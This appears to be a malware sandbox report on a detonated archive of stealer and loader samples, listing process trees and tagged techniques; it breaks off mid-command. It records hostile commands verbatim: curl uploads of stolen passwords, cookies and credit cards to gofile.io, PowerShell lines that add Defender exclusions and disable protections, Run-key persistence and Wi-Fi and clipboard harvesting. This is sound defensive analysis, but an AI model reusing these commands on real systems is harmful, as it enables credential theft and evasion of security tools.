PID 5032 wrote to memory of 1204	5032	New Text Document mod.exe	90
PID 5032 wrote to memory of 2376	5032	New Text Document mod.exe	91
PID 5032 wrote to memory of 2376	5032	New Text Document mod.exe	91
PID 5032 wrote to memory of 2376	5032	New Text Document mod.exe	91
PID 5032 wrote to memory of 1956	5032	New Text Document mod.exe	92
PID 5032 wrote to memory of 1956	5032	New Text Document mod.exe	92
PID 1956 wrote to memory of 4936	1956	x.exe	98
PID 1956 wrote to memory of 4936	1956	x.exe	98
PID 5032 wrote to memory of 2864	5032	New Text Document mod.exe	100
PID 5032 wrote to memory of 2864	5032	New Text Document mod.exe	100
PID 5032 wrote to memory of 2864	5032	New Text Document mod.exe	100
PID 3496 wrote to memory of 3828	3496	4363463463464363463463463.exe	101
PID 3496 wrote to memory of 3828	3496	4363463463464363463463463.exe	101
PID 3496 wrote to memory of 3828	3496	4363463463464363463463463.exe	101
PID 3828 wrote to memory of 1284	3828	stories.exe	102
PID 3828 wrote to memory of 1284	3828	stories.exe	102
PID 3828 wrote to memory of 1284	3828	stories.exe	102
PID 1956 wrote to memory of 4732	1956	x.exe	103
PID 1956 wrote to memory of 4732	1956	x.exe	103
PID 1284 wrote to memory of 2944	1284	stories.tmp	105
PID 1284 wrote to memory of 2944	1284	stories.tmp	105
PID 1284 wrote to memory of 2944	1284	stories.tmp	105
PID 1956 wrote to memory of 2632	1956	x.exe	106
PID 1956 wrote to memory of 2632	1956	x.exe	106
PID 1956 wrote to memory of 560	1956	x.exe	109
PID 1956 wrote to memory of 560	1956	x.exe	109
PID 3496 wrote to memory of 4760	3496	4363463463464363463463463.exe	111
PID 3496 wrote to memory of 4760	3496	4363463463464363463463463.exe	111
PID 3496 wrote to memory of 4760	3496	4363463463464363463463463.exe	111
PID 3496 wrote to memory of 2148	3496	4363463463464363463463463.exe	112
PID 3496 wrote to memory of 2148	3496	4363463463464363463463463.exe	112
PID 3496 wrote to memory of 2148	3496	4363463463464363463463463.exe	112
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 2148 wrote to memory of 4604	2148	Loader.exe	114
PID 3496 wrote to memory of 3148	3496	4363463463464363463463463.exe	115
PID 3496 wrote to memory of 3148	3496	4363463463464363463463463.exe	115
PID 3496 wrote to memory of 3148	3496	4363463463464363463463463.exe	115
PID 3148 wrote to memory of 1876	3148	KillingInstructional.exe	116
PID 3148 wrote to memory of 1876	3148	KillingInstructional.exe	116
PID 3148 wrote to memory of 1876	3148	KillingInstructional.exe	116
PID 1876 wrote to memory of 4824	1876	cmd.exe	118
PID 1876 wrote to memory of 4824	1876	cmd.exe	118
PID 1876 wrote to memory of 4824	1876	cmd.exe	118
PID 1876 wrote to memory of 2648	1876	cmd.exe	119
PID 1876 wrote to memory of 2648	1876	cmd.exe	119
PID 1876 wrote to memory of 2648	1876	cmd.exe	119
PID 1876 wrote to memory of 4368	1876	cmd.exe	120
PID 1876 wrote to memory of 4368	1876	cmd.exe	120
PID 1876 wrote to memory of 4368	1876	cmd.exe	120
PID 1876 wrote to memory of 4532	1876	cmd.exe	121
PID 1876 wrote to memory of 4532	1876	cmd.exe	121
PID 1876 wrote to memory of 4532	1876	cmd.exe	121
PID 1876 wrote to memory of 3452	1876	cmd.exe	122
PID 1876 wrote to memory of 3452	1876	cmd.exe	122
PID 1876 wrote to memory of 3452	1876	cmd.exe	122

System policy modification 1 TTPs 4 IoCs

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	SeetrolCenter.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	SeetrolCenter.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	SeetrolCenter.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	SeetrolCenter.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
7112	attrib.exe
1184	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3260
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3236
- C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe
  "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1204
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe"
    3⤵
    - Executes dropped EXE
    PID:2376
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:560
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2864
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4396
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"
    3⤵
    - Executes dropped EXE
    PID:4756
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:2444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:720
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
        5⤵
        
        PID:2632
      - C:\Windows\system32\reg.exe
        
        reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
        6⤵
        Modifies registry key
        
        PID:2444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
        5⤵
        
        PID:4936
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:3520
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2660
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:4860
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:3848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:4716
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:2992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3588
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3216
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1308
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1348
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5064
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe"
    3⤵
    - Executes dropped EXE
    PID:5768
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    PID:5132
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      PID:5168
  - - C:\Windows\system32\audiodg.exe
      "C:\Windows\system32\audiodg.exe"
      4⤵
      Adds Run key to start application
      PID:5228
  - - C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe"
      4⤵
      Adds Run key to start application
      PID:4356
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"
    3⤵
    - Executes dropped EXE
    PID:6192
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"
      4⤵
      Executes dropped EXE
      PID:6380
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c
        5⤵
        
        PID:6420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c
        5⤵
        
        PID:5456
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c
        5⤵
        
        PID:6376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35
        5⤵
        
        PID:6472
      - C:\Windows\system32\mode.com
        
        mode con: cols=125 lines=35
        6⤵
        
        PID:6468
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:5380
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get UUID
        5⤵
        
        PID:6440
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:3896
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"
    3⤵
    - Executes dropped EXE
    PID:2992
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"
      4⤵
      Executes dropped EXE
      PID:6316
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        5⤵
        
        PID:5156
      - C:\Windows\system32\taskkill.exe
        
        taskkill /im firefox.exe /t /f
        6⤵
        Kills process with taskkill
        
        PID:2664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5292
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:6968
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5868
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:2484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:5136
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:5780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:540
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:6392
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:4208
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:6664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:6676
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:1624
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
        5⤵
        
        PID:6748
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
        6⤵
        
        PID:7108
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"
    3⤵
    - Executes dropped EXE
    PID:6188
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"
      4⤵
      Executes dropped EXE
      PID:2900
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"
    3⤵
    - Executes dropped EXE
    PID:6536
  - - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe
      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      PID:5076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'"
        5⤵
        
        PID:6320
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:5760
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
        5⤵
        
        PID:5648
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
        6⤵
        
        PID:4152
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4080
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:6040
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:7056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        5⤵
        
        PID:5652
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        6⤵
        
        PID:1652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        5⤵
        
        PID:5844
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        6⤵
        
        PID:1272
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5792
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3248
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5524
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
        5⤵
        
        PID:1624
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5880
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6772
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5876
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6876
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:6276
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:2988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:5156
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:6176
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5452
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:2276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2236
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:1080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2900
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:6072
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:1228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:576
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:5760
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 